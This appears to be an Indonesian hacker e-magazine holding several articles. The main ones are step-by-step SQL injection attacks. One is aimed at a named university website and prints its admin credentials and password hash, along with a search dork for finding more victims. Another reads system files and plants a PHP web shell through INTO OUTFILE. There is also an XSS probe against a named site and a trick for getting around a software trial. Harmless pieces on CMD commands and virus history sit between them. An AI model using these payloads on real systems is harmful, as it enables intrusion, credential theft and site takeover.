Referensi : Pengalaman pribadi

/Nick : Nobita HC

/Location : Palembang – Sumatera Selatan

/Email : [email protected]

/Web : www.marping.web.id | www.warunggue.com



SQL Injection by Xyberbreaker Membobol Situs Perguruan Tinggi

Writer : Xyberbreaker ([email protected])

Ok, ketemu lagi ama aku, semoga gak bosen ya....

kali ini q bakal nunjukin cara hack salah satu situs perguruan

tinggi di Indonesia

Tool:

1. Mozilla

2. Notepad

3. HexConverter ( download di

http://peretas.freeforums.org/download.php?id=14

password: vires) kalo gk bisa, daftar dulu.. hehe..

Pertama, cari target

Misal: http://www.nwu.ac.id

Kedua, cari bug nya

Misal:http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=1

Ketiga, cek apakah ada kutunya

Jadinya:http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=1'

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in

/home/nwuaci/public_html/stikes/mod/publisher/publisher.php on line 213

ok berarti kutunya ada...

Keempat, mulai beraksi... kita pake perintah order

http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+1 <---gak

ada error


ada error


ada error


ada error


ada error


ada error


ada error




ada error


ada error

http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-1+order+by+10 <---

gak ada error


gak ada error


ada error

Ok, kita tau kalo web itu ada 11 kolom

Kelima, kita pake perintah union buat munculin Adwisatya mAgic Number hehe....

http://www.nwu.ac.id/stikes/mod.php?mod=publisher&op=viewarticle&artid=-

1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--

ok, nomor yang muncul n paling jelas no 4

Keenam, cek versinya pake @@version


1+union+all+select+1,2,3,@@version,5,6,7,8,9,10,11--

ok, kita liat 5.0.67-community

Mode girang [on]

Ketuju, kita cari tau nama tabel pake group_concat(table_name) from

information_schema.tables+where+table_schema=database()


1+union+all+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11from

information_schema.tables+where+table_schema=database()—

akbid_authors,akbid_banner,akbid_bannerclient,akbid_bannerfinish,akbid_bukutamu,akbid_counter,

akbid_lblocks,akbid_main_page_content,akbid_menu,akbid_mod_calendar_category,akbid_mod_cal

endar_events,akbid_mod_calendar_location,akbid_mod_calendar_post,akbid_mod_calendar_setting

s,akbid_mod_calendar_subcat,akbid_mod_diskusi,akbid_mod_diskusi_ca

keliatankan??? hm... kayaknya ada yg berharga akbid_authors

Kedelapan, kita cari tahu nama kolom dalam tabel akbid_authors pake group_concat(column_name)

from information_schema.columns+where+table_name=ox(hex nama tabel)


1+union+all+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11%20from%20information_sche

ma.columns+where+table_name=0x616B6269645F617574686F7273

ok, kelihatan kan??

aid,name,url,email,pwd,counter



Kesembilan, kita lihat isi dari kolom diatas...


1+union+all+select+1,2,3,group_concat(namakolom),5,6,7,8,9,10,11%20from namatable

jadinya :


1+union+all+select+1,2,3,group_concat(aid,0x3a,name,0x3a,url,0x3a,email,0x3a,pwd,0x3a,counter),5

,6,7,8,9,10,11%20from%20akbid_authors

jelas nih :

admin:Webmaster:http://www.nwu.ac.id:[email protected]:626c0a253fd6a1d13d4358eec31f14b4:

7

admin = username untuk login

Webmaster = status

[email protected] = email admin (kalo mau ngasih tau, tapi udah telat, coz udah q kasih tau)

626c0a253fd6a1d13d4358eec31f14b4 = password dalam md5 crck di

http://thesoftwareengineer.org/services/md5.php

Kesepuluh, login jadi admin

http://www.nwu.ac.id/admin

Kesebelas.... tunjukkan xpresi lo... devil mode [on]

Tambahan:

untuk mencari target: inurl:"mod.php?mod=publisher

Exploit:

-

13%20union%20select%201,2,3,4,5,6,group_concat(aid,0x3a,name,0x3a,email,0x3a,pwd),8,9,10,11%

20from%20authors--

-

13%20union%20select%201,2,group_concat(aid,0x3a,name,0x3a,email,0x3a,pwd),4,5,6,7,8,9,10%20f

rom%20authors--

pilih salah satu, jika masih tidak bisa...

lakukan seperti langkah - langkah diatas..

Thanks: JatimCrew, vires, elfata, Spy_kit33



IP Command Mengenal IP Command pada CMD


MS DOS Promt atau biasa kita kenal dengan CMD

memang terkenal dengan tampilan yang polos tapi masih

banyak digunakan para Hacker di dunia untuk melakukan

aksinya. Kali ini gw coba berbagi sedikit pengatahuan lagi

tentang perintah-perintah yang berhubungan jaringan

yang biasa digunakan para Hacker untuk mengetahui informasi computer/server target dan milik kita

sendiri, berikut perintah-perintahnya (sebelumnya aktifkan CMD) :

ipconfig/all

Berfungsi untuk menampilkan informasi konfigurasi koneksi, seperti Host Name, Primary DNS type,

Ethernet Adapter LAN.

ipconfig/displaydns

Berfungsi untuk menampilkan DNS Cache

ipconfig/flushdns

Berfungsi untuk menghapus DNS Cache

ipconfig/release

Berfungsi untuk menghapus semua koneksi IP address

ipconfig/renew

Berfungsi untuk membuat IP address baru

ipconfig/registerdns

Berfungsi untuk melakukan refresh DNS dan meregister kembali koneksi DNS

ipconfig/showclassid

Berfungsi untuk menampilkan informasi DHCP Class

Ipconfig/setclassid

Berfungsi untuk mengubah DHCP Class ID

control netconections

Berfungsi untuk membuka jendela Network Connection

ping

Berfungsi untuk melakukan test koneksi ke suatu situs atau IP Address tertentu, contoh ping

www.google.com



tracert

Berfungsi untuk menampilkan informasi IP Address route

netstat

Berfungsi untuk menampilkan informasi koneksi TCP/IP yang sedang aktif

route

Berfungsi untuk menampilkan local route

hostname

Berfungsi untuk menampilkan nama computer

Mungkin masih banyak lagi perintah-perintah yang bisa dilakukan, tapi karena pengetahuan gw yang

terbatas jadi lo cari sendiri aja yah. ☺

Gw harap dengan sedikit pengetahuan ini kita bisa tau hal kecil tapi sangat penting untuk diketahui

untuk menjadi ahli security atau hacker. (tapi gw ngomong kayak gini bukan berate gw dah jago yah,

Cuma kebetulan gw pengen nulis tentang hal ini aja).

Referensi : eBook dari www.klik.to, Cuma gw tulis ulang dengan bahasa sendiri. ☺

/Nick : ciebal






Virus Section Knowledge, History, Type of Virus, etc…

Writer : ramz ([email protected])

Knowledge….

Virus merupakan program yang sengaja dibuat oleh manusia tujuannya untuk merusak

system yang ada pada computer. Program ini memiliki kemampuan untuk mengandakan

diri, merusak system, mengubah konfigurasi system, dan masih banyak lagi. Umunya virus

hanya dapat merusak software tapi tidak menutup kemungkinan hardware akan rusak

apabila suatu computer dipaksa untuk melakukan pekerjaan yang sangat berat.

Umumnya virus yang beredar di dunia IT adalah virus yang menyerang computer berbasis

Windows, tetapi OS yang lainnya belum tentu terbebas dari virus. Berikut adalah data dari

sumber terpercaya (95% Windows, 2% Linux, 1% Mac OS X, 2% FreeBSD)

History …

Virus computer pertama kali digunakan oleh Fred Cohen untuk papernya yang berjudul “Computer Viruses –

Theory and Experiments”. Pada papernya ia menerangkan bahwa sifat dasar virus komputer yaitu: mempunyai

kemampuan untuk menjangkiti (menginfeksi) program lain dan menyebar. Pada dasarnya penggunaan isitlah virus

dikarenakan adanya kesamaan dalam hal sifat antara virus komputer dengan virus yang kita kenal dalam dunia fisik. Di

mana keduanya memiliki dua tujuan yaitu: untuk bertahan hidup dan bereproduksi.

Berikut merupakan perkembangan virus dari tahun 1981 – 2004.

1949, Teori Self-Replicating Program (Program Yang Dapat Menggandakan Diri) Pertama Kali Diperkenalkan.

1981, Virus Komputer Pertamakali Yang Menyerang Sistem Operasi Apple 2 Muncul Dan Menyebar Melalu

Program-Program Game Komputer Bajakan Di Texas.

1983, Fred Cohen Mengimplementasikan Definisi Baku Bagi Virus Komputer.

1986, Virus Boot Sector Pertama Kali Ditemukan, Virus Ini Menyerang PC (Personal Computer) Dengan Nama

Virus Brain Dibuat Oleh Dua Orang Programmer Dari Pakistan Bernama Basit Dan Amjad. Pada Tahun Ini Juga

Diperkenalkan Pertama Kalinya Virus Yang Mampu Menginfeksi File, Diberi Nama Virdem (Virus Demo) Dibuat

Di Jerman.

1987, Virus Yang Mampu Menginfeksi Dua Jenis File .COM Dan .EXE Ditemukan Di Universitas Hebrew Israel.

Virus Ini Bernama Jerusalem Dan Masih Memiliki Kesalahan (Bug) Yang Menyebabkan Virus Menginfeksi Ulang

(Reinfection) File Yang Telah Terinfeksi Sebelumnya. Pada Tahun Ini Pula Virus Stoned Dan Vienna Ditemukan,

Virus Stoned Mampu Menginfeksi MBR (Master Boot Record) Dan Dibuat Oleh Seorang Pelajar Di Universitas

Wellington New Zealand, Sedangkan Virus Vienna Dibuat Oleh Seorang Pelajar Menengah Di Austria.

1989, Kemunculan Virus Dari Bulgaria Bernama Dark Avenger Dibuat Oleh Seseorang Yang Mengaku Dirinya

Dark Avenger. Virus Ini Merupakan Jenis Virus Yang Menyerang Antivirus. Pada Tahun Ini Pula Virus Yang

V



Menginfeksi File .EXE Dengan Kemampuan Stealth Ditemukan, Virus Ini Bernama Frodo Dan Akan Melakukan

Perusakan Hardisk Apabila Virus Berjalan Setelah Tanggal 22 September Setiap Tahunnya.

1991, Virus Indonesia Pertamakali Ditemukan, Virus Ini Bernama Den Zuko Dan Terdapat 2 Varian. Virus Ini

Dibuat Oleh Denny Yanuar Ramadhani Dari Bandung Indonesia. Virus Ini Mampu Menghapus (Disinfect) Disk

Yang Telah Terinfeksi Oleh Virus Brain. Hal Ini Menjadi Bukti Adanya Virus Komputer Yang Menyerang Virus

Komputer Lain. Pada Tahun Ini Pula Virus Bernama Tequila Lahir, Virus Ini Memiliki Kemampuan Stealth,

Polymorphic, Multipartition Dan Juga Anti-Antivirus.

1992, Virus Boot Sector Dengan Nama Michelongelo Berhasil Menginfeksi Lebih Dari 5 Juta Komputer Di

Seluruh Dunia. Pada Tahun Ini Pula VCL (Virus Creation Laboratory) Pertama Kali Tercipta,.VCL Merupakan Tool

Kit Yang Dapat Untuk Membuat Virus Komputer Secara Instan, Artinya Virus Bisa Dibuat Oleh Siapa Saja Tanpa

Membutuhkan Pengetahuan Pemrograman Dari Pembuatnya.

1994, Virus Dengan Nama Pathogen Muncul Di Inggris. Virus Ini Memiliki Kemampuan Polymorphic, Dibuat

Oleh Seorang Yang Mengaku Bernama Black Baron, Sang Pembuat Berhasil Tertangkap Dan Dipenjara.

1995, Virus Makro Tercipta Yang Pada Waktu Itu Mulai Menginfeksi Dokumen Jenis Microsoft Word.

1996, Virus Makro Yang Menginfeksi File-File Office Word Dan Excel Tercipta.

1997, Terdapat Kurang Lebih 12000 Virus Baru Tercipta Dan Tersebar Di Seluruh Dunia.

1998, Virus Benama Strangebrew Membuktikan Akan Virus Yang Mampu Menginfeksi File Java. Java Sendiri

Merupakan Platform Yang Pernah Di Bangga-Banggakan Akan Predikat “Bebas Virus”-Nya. Pada Tahun Ini Pula

Dua Anak Umur Belasan Dari California Berhasil Membobol Dan Mengendalikan Sekitar Lebih Dari 500 Sistem

Komputer Pemerintahan Dan Militer Di Amerika.

1999, Virus Makro Dengan Nama W97M/Melissa Hadir. Virus Ini Mampu Menyebarkan Dirinya Melalui Pesan

Elektronik (E-Mail) Dan Berhasil Menginfeksi Kurang Lebih 1 Juta Komputer Di Seluruh Dunia. Di Lain Tempat

Virus CIH Menyebar Cukup Pesat Di Korea Dan Menyebabkan Kerugian Finansial Kurang Lebih US $ 250 Juta,

Virus CIH Sendiri Merupakan Virus Yang Memiliki Kemampuan Untuk Merusak Hardware Dengan Cara

Mengoverwrite BIOS.

2000, Virus ILOVEYOU (Love Bug) Yang Mirip Dengan Virus Melissa Menyebar Lewat Email Dan Memilik Aksi

Menghapus Beberapa File Multimedia Seperti .MP3, .MP2 Dll. Virus Ini Memiliki Kemampuan Untuk Mencuri

Informasi Berharga Korban Yang Terinfeksi Dan Mengirimkan Kepada Pembuatnya.

2001, Worm Dengan Nama Codered Berhasil Menginfeksi Lebih Dari 300.000 Komputer Di Seluruh Dunia Dan

Mengakibatkan Kerugain Sebesar Kurang Lebih US $ 2.5 Milyar.

2002, Pembuat Virus W97M/Melissa Tertangkap Oleh Pihak Federal Dan Dikurung Selama 20 Bulan. Pada

Tahun Ini Pula Muncul Worm Bugbear Yang Memiliki Beraneka Macam Tehnik Infeksi Dengan Beberapa

Metode Yang Kompleks Dan Juga Kelahiran Worm Nimda (Merupakan Aksara Terbalik Dari Kata “Admin”) Dan

Klez.



2003, Merupakan Tahun Kejayaan Worm. Worm Dengan Nama Slammer Tercipta Dan Berhasil Menginfeksi

Tidak Kurang Dari 75.000 Komputer Di Seluruh Dunia Dalam Waktu 10 Menit Setelah Tercipta. Worm Ini

Memiliki Kecepatan Reproduksi Dan Penyebaran Tercepat Yaitu 8.5 Detik/Worm. Pada Tahun Ini Pula Worm

Sobig Lahir Dan Merupakan Worm Yang Mampu Melakukan Aktifitas Spam Besar-Besaran, Setiap E-Mail Yang

Dikirimkan Akan Memiliki Nama Pengirim

<!– Var Prefix = ‘Ma’ + ‘Il’ + ‘To’; Var Path = ‘Hr’ + ‘Ef’ + ‘=’; Var Addy15158 = ‘Big’ + ‘@’; Addy15158 =

Addy15158 + ‘Boss’ + ‘.’ + ‘Com’; Document.Write( ” ); Document.Write( Addy15158 ); Document.Write( ” ); //–

>\N [email protected] <!– Document.Write( ‘‘ ); //–>

Email telah dilindungi dari Spam Bots, Anda harus mengaktifkan Java untuk dapat melihatnya <!–

document.write( ” ); //–> , Worm Yang Memiliki Pangkat MM (Mass Mailer) Ini Telah Mengakibatkan Kerugian

Ekonomi Sebesar US $ 29.7 Miliar. Belum Lagi Selesai Terror Worm Sobig, Muncul Lagi Worm Blaster Yang

Menyerang Servis RPC (Remote Procedure Call) Pada Sistem Operasi Windows, Worm Yang Pernah Membuat

Pihak Microsoft Kalang Kabut Ini Memiliki Kecepatan Penyebaran 4000 Infeksi/Jam.

2004, Worm Dengan Nama Mydoom Merajai Pervirusan Dunia Dengan Tingkat Infeksi Yang Tinggi Dan

Menguasai 30% Bandwidth Yang Digunakan Internauts (Pengguna Internet) Di Seluruh Dunia. Worm Yang

Menyandang Rating High Risk Dari Beberapa Vendor Antivirus Ini Memiliki Daya Hancur Yang Lebih Hebat Dari

Worm Sobig Dan Welchia, Selain Itu Worm Ini Juga Melakukan Serangan Ddos (Distributed Denial Of Service)

Ke Situs Www.Sco.Com Dan Www.Microsoft.Com Dan Juga Memblok Beberapa Situs Antivirus

Kriteria Virus …

Menurut y3dips [salam kaka ☺ ].

Ada 5 kriteria, dan apabila semua melengkapi barulah program tersebut dapat dikatakan virus . Kriteria tersebut adalah :

1. Kemampuan untuk mendapatkan informasi.

Informasi dalam hal ini adalah informasi tentang keadaan computer tersebut ( program apa yang rentan di

serang, bagaimana system keamanannya ).

2. Kemampuan memeriksa suatu program.

Dalam penularan / penyerangan virus tersebut harus tau apakah file dengan ekstensi ini sudah siap untuk

diserang/tulari, belum siap untuk diserang/tulari, atau bahkan sudah diserang/tulari ?

3. Kemampuan menggandakan diri.

Bukan virus namanya kalo gak bisa menggandakan diri. Hal ini merupakan hal terpenting dalam criteria virus.

Biasanya cara tersebut adalah :

a. Menulari file / program setelah itu menghapus / merename file aslinya.

b. Menumpangi seluruh file / program yang ada apabila virus tersebut sudah di load.

4. Kemampuan untuk manipulasi.

Umumnya virus pada OS Windows memanipulasi registry, dan melakukan perubahan setting. Hal ini sudah dapat

menjelaskan kemampuan untuk manipulasi.

5. Kemampuan untuk menyembunyikan diri / kamuflase.

Kamuflase / penyembunyian juga merupakan hal yang terpenting, apalagi jika kita berbicara soal Anti Virus,

namun memang hal ini yang digunakan untuk mengelabui antivirus.



JENIS – JENIS VIRUS

Jenis – jenis virus yang sering beredar di dunia computer adalah sebagai betikut :

• Virus Boot Sector :

Virus ini sudah langka, namun sangatlah berbahaya. Karena virus ini menginfeksi boot sector, yang

merupakan sesuatu yang dibaca pertama kali oleh system operasi pada saat computer sedang diakses.

Sehingga pada saat booting virus menetap di memory dan dapat langsung melaksanakan aksinya pada

penyerangan ke media penyimpanan yang lain [disket, flashdisk, dll] yang terhubung ke computer tersebut.

• Virus File :

Jenis virus ini adalah jenis yang virus yang paling banyak kita jumpai. Jenis file untuk virus ini adalah jenis file

dengan type execution [.exe / .bat / .vbs / .com]. Tingkat bahaya dari virus ini tergantung ke kreatifan

programmer dalam membuat virusnya, sehingga tidak dapat di tentukan tingkat bahaya virus ini. Biasanya

virus ini melakukan perintah – perintah penghapusan data, penggantian value pada suatu data sehingga

bersifat fatal, penyerangan terhadap registry, dan lain – lain.

• Virus Macro :

Virus ini terbentuk ketika windows memberikan fitur baru yang memudahkan penggunanya tetapi

disalahgunakan sehingga terbentuklah lagi virus baru yakni “virus makro”. Okey, kita cari kembali arti dari

makro adalah perintah yang mirip dalam bahasa pemrograman yang disediakan oleh perangkat lunak untuk

melakukan suatu pekerjaan tertentu.

• Multi Partition Virus

Virus program dan virus boot yang ganas, dengan cara kerja menginfeksi suatu program kemudian setelah

terinfeksi virus tersebut dijalankan yang menyebabkan penyerangan virus terhadap boot sector. Pendeknya

virus ini adalah gabungan dari Virus File dan Virus Boot Sector.

• Stealth Virus

Banyak pendapat tentang virus ini ada yang berpendapat demikian “mengalihkan Virus ini akan

menguasai tabel tabel interupt pada DOS yang sering kita kenal dengan "Interrupt interceptor".

virus ini berkemampuan untuk mengendalikan instruksi instruksi level DOS dan biasanya mereka

tersembunyi sesuai namanya baik secara penuh ataupun ukurannya .”

Kesimpulannya adalah Stealth Virus menggunakan banyak cara untuk mengamankan dirinya agar

tidak terdeteksi oleh antivirus / pengguna computer.

• Polymorphic Virus :

Jenis virus ini cukup brilliant, dengan cara mengenkripsi dirinya, dengan cara tersebut virus

tersebut dapat lolos dari pendeteksian antivirus.



MEDIA PENYEBARAN VIRUS

Eitss...

Virus ga tiba – tiba nongol di PC kita loh, kecuali kita yang buat ☺ Tapi suatu virus memanfaatkan

media untuk melakukan aksinya. Disini akan dibahas sedikit tentang media yang digunakan untuk menyebarkan

virus.

• Media external :

Media external adalah media yang paling sering digunakan oleh pengguna computer. Terutama media

yang bersifat R / W atau Read Write. [ Flashdisk, Disket, CD RW, Hardisk External, MMC, dll]

• Media Jaringan :

Media jaringan merupakan media yang memungkinkan terjadinya pertukaran data antara penggunanya.

Dengan pertukaran data itulah letak kemudahan virus untuk menyebarkan dirinya.

[ LAN. WAN. MAN ]

• Media Online :

Banyak media online yang dapat di inject malcode, salah satunya adalah WWW. Mungkin celah eksekusi

VBScript pada Internet Explorer sudah di tutup, tapi masih ada kemungkinan seiring perkembangan IT.

• Media Attachment / Download File:

Melalui attachment atau download file tidak menutup kemungkinan file yang anda download adalah

sebuah virus / aplikasi jelmaan virus. Sehingga dalam mendownload suatu file [terutama program] harus

jelas asal – usul file tersebut.

PENCEGAHAN VIRUS :

Satu hal yang harus diingat

“Virus ada karena media”

Nah, media tersebutlah yang harus kita antisipasi agar tidak terjangkiti virus. Okey sekarang ada beberapa cara

untuk mengantisipasi hal tersebut Biasanya. Biasanya loh ya….

Virus menyebar melalui media dengan cara :

1. File autorun.inf

File ini adalah loader yang di letakkan di setiap root pada suatu drive.

Antisipasi :

� Buatlah folder autorun.inf di setiap root drive pada media yang anda gunakan.

� Alternatif lain. Masuklah ke CMD lalu ketikkan

assoc .inf=textfile

2. File desktop.ini

Sama halnya dengan autorun.inf tetapi bedanya adalah biasanya file desktop.ini berkoordinasi

dengan file folder.htt.

Antisipasi :

� Buatlah folder desktop.ini di setiap root drive pada media yang anda gunakan.

� Alternatif lain. Masuklah ke CMD lalu ketikkan



assoc .ini=textfile

assoc .htt=textfile

Ending.

Bacaan ini adalah bacaan ringan yang hanya dikhususkan bagi newbie, mohon maaf apabila ada kesalahan dan kesan “sok

menggurui” dalam bacaan ini.

Writer : ramz

Support : GOD | HC STAFF | ALL OF MY FRIEND

Source : Virus article made by : y3dips

Filez Magazine



Guitar Pro 5.2 Demo Version Ternyata Ada Pintu Yang Lupa di Tutup...

Writer : EiGhtTailz ([email protected])

A Little Word……

Hhuft… akhirnya bisa juga nulis artikel buat HC eMagazine… Moga-moga aja tulisan gw ini bisa

nampang di edisi Perdana (Ngarep mode = On) ☺. Niatnya sih gw mw masukin artikel ttg Cracking, Hacking n

lainnya, but coz waktunya udah mepet, gw takut aja g bisa nyumbang buat edisi 1, kan sebagai member aktif

HC gw g boleh ketinggalan donk!!, kontribusi gw mana?? (deuh,, gaya lo udah kyk Contributor ae…), Member

yg laen juga g boleh ketinggalan yah…..

Keep Share n Learn…..

Sekilas tentang Guitar Pro…

Dari namanya aja kalian udah pada tau donk software buat apa?? Yupz bener bgt!! Guitar Pro adalah

software yg dipergunakan untuk membaca tabulasi gitar dalam file yg berformat .midi , membuat tabulasi gitar

sendiri juga bisa, n masih banyak lagi hal yg bisa dilakukan….

Gw dapet software ini dari temen gw yg pada doyan maen band n doyan Gigitaran (bahasa apaaaan

tuh?? Aneh), Akhirnya gw minta aja nih software n langsung ditaro di FD gw,, setelah gw install di

rumah….OMD ( Oh…My Dog!!) ternyata Cuma trial version….anjrit gw di kibulin #!%$*@ ….katanya software

bagus masa trial version….cape deh….Langsung aja gw kirim Semeses (SMS) ke temen gw yg ngasih software (

si Billie Jay).

E.T : “ Eh bro….Serial Numbernye mane?? Kok Cuma trial c? ah lo tega banget ngibulin gw”.

B.J : “ Oiya Sorry Bos ….Aim Proget Coy!! Ntu Cuma demo Version, lo Registerin deh sekalian,, kan lo jago

computer tuh ( Narsis mode = On ), or lo crackingin kek….ntar kalo udah bisa kasih gw

yah………Wkekeke…

E.T : “ Asem bener dah…..nyusahin ae lo curut!! Ntar gw usahain deh….tapi keknya butuh proses lama……n ntu

juja kalo bisa….makanya ntar malem lo solat tahajud, doain gw supaya bisa ngadalin nih

software…hehe”.

B.J : “ Lah……doain emak gw aja jarang…..ngapain juga doain lo……cape deh!!”

.......:::......End of Story.......:::........



Let`s the Show Begin....

Gw ambil FD gw trus gw colok deh di kompie gw.....buka file setup....Install dah ......

Setelah proses install yg tidak banyak memakan waktu..... tapi ngebetein....... sampailah kita didalam program

Guitar Pro......

Kalo menurut gw keren lah tampilan nya....

Kombinasi Pink yg cantik....But,,

Nah loh......

Bener kan kata gw??? Cuma trial...........asem bener dah...............

Liat neh...........



Cuma dikasih 15 hari coy......pelit banget dah tuh programmer......coba dikasih 15 tahun.....wkekeke...... ; P

Akhirnya gw coba klik tuh tombol Order!

N ini yg kluar.....

Wadoh...... kayaknya kalo mau registrasi harus bwa kompie gw ke warnet,, cape deh....udah gitu

disuruh bayar lagi.....ogah beud.....Terbersit di otak gw buat cracking nih software.....Gw otak-atik semaleman

pake ollydbg... g ketemu2.....mpe akhirnya gw pusing sendiri, entah databasenya di encrypt or emang gw nya

aja katro.....maklum lah baru belajar cracking disuruh crack software yg versi 5, jelas udah banyak yg di

patch.....nyerah gw dah........ Mpe akhirnya beberapa hari setelah musibah itu (gagal crack), gw mampir ke hoz

temen gw lagi, abis bete di hum liat kompie mulu, mo maen cewe but g punya ( ngiri gw ma yg punya pacar),

gw curhat aja ma temen gw....



E.T : “ Jay, gw gagal neh....Bingung gw....algoritmanya g ketemu2.....mungkin nti kalo gw udah jago....nyerah

gw......”

B.J : “ Ah payah lo ah....katanya jago!! “ ( Sedih bgt gw digituin..... )

E.T : “ Sini gw pinjem kompie lo...”

Akhirnya gw megang kompie dy...gw buka lagi tuh software sialan ( Guitar Pro, abis gw kesel ),, eh punya dy

udah kadaluarsa alias end of trial version....

Biz ntu gw lepas tuh kompie n gw tiduran di kasur dy...( hayah,, jgn mikir mesum ya....) gw mikir2 “ How should

I do ??? “,, masih terus berpikir n gw baru inget kalo ngebuka or ngejalanin file tuh bisa dilakukan dengan

beberapa cara, n gw juga pernah baca disebuah artikel tentang pintu yg lupa ditutup oleh programmernya ,

jalan pertama yg gw coba adalah klik kanan pada GP lalu Run as,

Kita lihat apa yang terjadi,, n benar saja, Guitar Pro kembali lagi pada saat awal trial version....

Aneh kan?? Padahal sudah jelas sebelumnya,, end of trial version...

Ini nyata....ternyata pintu Run as lupa ditutup oleh sang programmer, haduh parah juga ya.....ternyata dengan

trik simple software ini bisa di “kadalin”, cape juga gw kalo gini caranya, udah susah2...hhuft....



Ini bisa dijadikan pembelajaran oleh kita semua yg ingin membuat software berbayar, perhatikan

pintu2 yg ada apakah sudah cukup aman??, n untuk para nubie kayak gw, pasti banyak yg bertanya,

Q : Om2, cara jadi hacker tuh gimana seh??

biasanya kita bingung sendiri ngejawabnya,

A : ya loe belajar script, bahasa pemograman, n De EL EL yg pasti bikin org pusing duluan...

Padahal sesuatu pemikiran yg besar ntu asalnya dari yang sederhana dulu, belajarlah selangkah demi

selangkah, step by step, gunakan logika, pasti ada aja kok jalannya, contohnya ya kayak gw ini, udah mikir jauh2

ternyata jawabannya depan mata nyesek kan???

~~~~~~~~~End Of Trick~~~~~~~~~

--^One Step Closer^--

/Nick : EiGhtTaiLz

/Location : Klapanunggal kab. Bogor - Depok

/YM : Ekor_Delapan (jgn lupa di add ya)

/No. HP : PM gw aja....

/Website : Baru belajar bikin, ntar kalo jadi gw kasih tau

Pesen2 ah : �HC : moga eksis selalu, moga eMagaZine tetap bertahan walaupun masih segede toge,

�Member : eksis terus donk, jgn absent mulu, minimal 1 minggu sekali maen ke HC apa

susahnya, mari kita buat HC jadi salah satu forum underground yg terpandang di negeri ini,

�Momod Proyek : Angkat topi deh buat lo Bal,, but jgn lupa artikel gw di muat di vol 1 ya

awas lo kalo kagak, �Poprats : Mane aje lo rats, gimana ngeband kemaren? Sukses g dapet

bini baru? �Jenny : we were made for each other, i`m here forever, I know we were.......

Thx to : � Allah SWT who gave my Brain to thinking...

� My Parents

� My Brother n My Lovely Cat “Sapi”

� My Laptop Toshiba - Pent. 3 - 40gb - 128ram



� X-CODE magazine

� Ryodan Genk : Ajay, Billie Jay, Ebenk, Malique, YuLizt

� Tenro Hakuya n Toke aka chaer.newbie

Dari gue : I.A.M | Ryodan Leader aka EiGhtTaiLz

...:::...Hidup adalah Pilihan...:::...

...:::...yang Kuat kan Bertahan, yang Lemah Berantakan...:::...

...:::...Itulah Kenyataan, sekeras apapun kau tuk Menyangkalnya...:::...



Advanced SQL Injection [Test On Windows XP]

Writer : eminem ([email protected])

Di tehnik ini saia akan mencoba melakukan serangan sql injection dan memasang shell di dalam situs dengan menggunakan syntax SQL.

Untuk mengetahui apakah tehnik ini dapad berjalan di sebuat situs adalah dengan memasukan perintah LOAD_FILE(‘/boot.ini’) pada magic number, perintah ini di gunakan pada OS win karena maksud dari perintah ini adalah membuka file boot.ini yang ada di dalam win apabila di linux gunakanlan LOAD_FILE(‘/etc/passwd’) ☺.

Masukanlah perintah tersebut ke dalam magic number sehingga url nya menjadi seperti ini

Nb : apabila magic_quotes_gpc di dalam situs posisi ON anda tinggal merubah ascii ke HEX atau DECIMAL

[lihat gambar di bawah]



Untuk perintah HEX :

http://localhost/pentest/index.php?id=-9%20union%20select%201,load_file(0x2F626F6F742E696E69),3,4,5--

untuk perintah DECIMAL:

http://localhost/pentest/index.php?id=-

9%20union%20select%201,load_file(char(47,98,111,111,116,46,105,110,105)),3,4,5--

tapi di sini magic_quotes_gpc dalam posisi OFF jd saia menggunakan perintah ini ☺

http://localhost/Pentest/index.php?id=-9%20union%20select%201, LOAD_FILE(‘/boot.ini’) ,3,4,5—

Bingo ☺ maka file boot.ini yang ada di dalam windows akan terbuka pada browser , ok sekarang kita akan

mencari di mana kah letak dari file index.php situs ini berada, karena saia di sini akan mencoba memasang

shell pada dir -Nya tersebut.

Untuk mencari di mana letak letak directorynya bias lihat file phpinfo.php atau php.ini dan carila file yang

bernama DOCUMENT_ROOT - C:/xampp/htdocs yaps berarti bisa kita artikan bahwa file root terletak di

C:/xampp/htdocs dan file index.php terdapat di C:/xampp/htdocs/Pentest/index.php ☺ ok sekarang coba

masukan perintah LOAD_FILE(‘C :/xampp/htdocs/Pentest/index.php’) sehingga ulr akan menjadi seperti ini



http://localhost/Pentest/index.php?id=-9%20union%20select%201,load_file(%27c:/xampp/htdocs/Pentest/index.php%27),3,4,5--

Ok sudah terlihat,di sini terlihat file index.php dari directory Pentest ☺

sekarang sudah sampai pada saat pemasangan file PHP yang dengan menggunakan perintah ‘<?include($_GET["cmd"]);?>’ yang di isikan pada magic number dan perintah into outfile ‘/xampp/htdocs/Pentest/error.php’ pada akhir guna dari perintah itu adalah membuat file error.php yang

berisikan <?include($_GET["cmd"]);?> ☺ sehingga urlnya seperti ini:

http://localhost/Pentest/index.php?id=-9%20union%20select%201,%27%3C?include($_GET[%22cmd%22]);?%3E%27,3,4,5%20into%20outfile%20%27/xampp/htdocs/Pentest/error.php%27--

☺ kita sudah berhasil membuat file error php dan memasukan bug RFI di dalamnya.

Sekarang coba anda akses shell tersebut dengan memasukan url seperti ini

http://localhost/pentest/error.php?cmd=http://localhost/pentest/shell.txt?

Evilcode = http://localhost/pentest/shell.txt?

Dan lihatlah hasil apa yang anda dapatkan ☺



Bingo ☺ sekarang shell sudah tersedia hehehehe..

Thanks to :

Allah Swt.

My mom , My dad & My brother

Mainhack Brotherhood

Serverisdown



XSS Attack Deface Web Tanpa Merusak

Writer : omicron9194 ([email protected])

Cross Site Scripting atau yang lebih dikenal dengan XSS, sudah sangat banyak di bicarakan. XSS ? Apa

itu? XSS adalah suatu cara memasukkan code / script HTML ke dalam suatu web site.Banyak web

programmer yang tidak terlalu memperhatikan bahaya XSS, atau mungkin terlalu banyak kesalahan

penulisan scripting pada halaman web sehingga mengizinkan beberapa karakter tertentu dijalankan

pada situs tersebut.

Untuk lebih memahami XSS,perhatikan contoh berikut :

http://www.petra.ac.id/search/index.php?q=<script>alert(‘xss ditemukan’)</script>

Site di atas mempunyai kelemahan terhadap XSS.Untuk mengetahui apakah suatu site mempunyai

